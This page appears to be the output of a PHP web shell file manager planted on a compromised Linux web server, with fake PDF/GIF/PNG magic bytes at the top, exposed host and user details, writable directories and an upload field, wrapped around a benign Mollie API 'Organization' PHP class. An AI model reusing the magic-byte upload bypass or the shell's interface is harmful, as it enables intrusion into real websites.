%PDF- %GIF98; %PNG; .
Cyber Programmer
Logo of a company Server : Apache
System : Linux host.digitalbabaji.in 4.18.0-513.11.1.el8_9.x86_64 #1 SMP Wed Jan 17 02:00:40 EST 2024 x86_64
User : addictionfreeind ( 1003)
PHP Version : 7.2.34
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/addictionfreeind/www/admin1/vendor/mollie/mollie-api-php/src/Resources/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/addictionfreeind/www/admin1/vendor/mollie/mollie-api-php/src/Resources/Organization.php
<?php

namespace Mollie\Api\Resources;

class Organization extends BaseResource
{
    /**
     * Id of the payment method.
     *
     * @var string
     */
    public $id;

    /**
     * The name of the organization.
     *
     * @var string
     */
    public $name;

    /**
     * The email address of the organization.
     *
     * @var string
     */
    public $email;

    /**
     * The preferred locale of the merchant which has been set in Mollie Dashboard.
     *
     * @var string
     */
    public $locale;

    /**
     * The address of the organization.
     *
     * @var \stdClass
     */
    public $address;

    /**
     * The registration number of the organization at the (local) chamber of
     * commerce.
     *
     * @var string
     */
    public $registrationNumber;

    /**
     * The VAT number of the organization, if based in the European Union. The VAT
     * number has been checked with the VIES by Mollie.
     *
     * @var string
     */
    public $vatNumber;

    /**
     * The organization’s VAT regulation, if based in the European Union. Either "shifted"
     * (VAT is shifted) or dutch (Dutch VAT rate).
     *
     * @var string|null
     */
    public $vatRegulation;

    /**
     * @var \stdClass
     */
    public $_links;
}

VaKeR 2022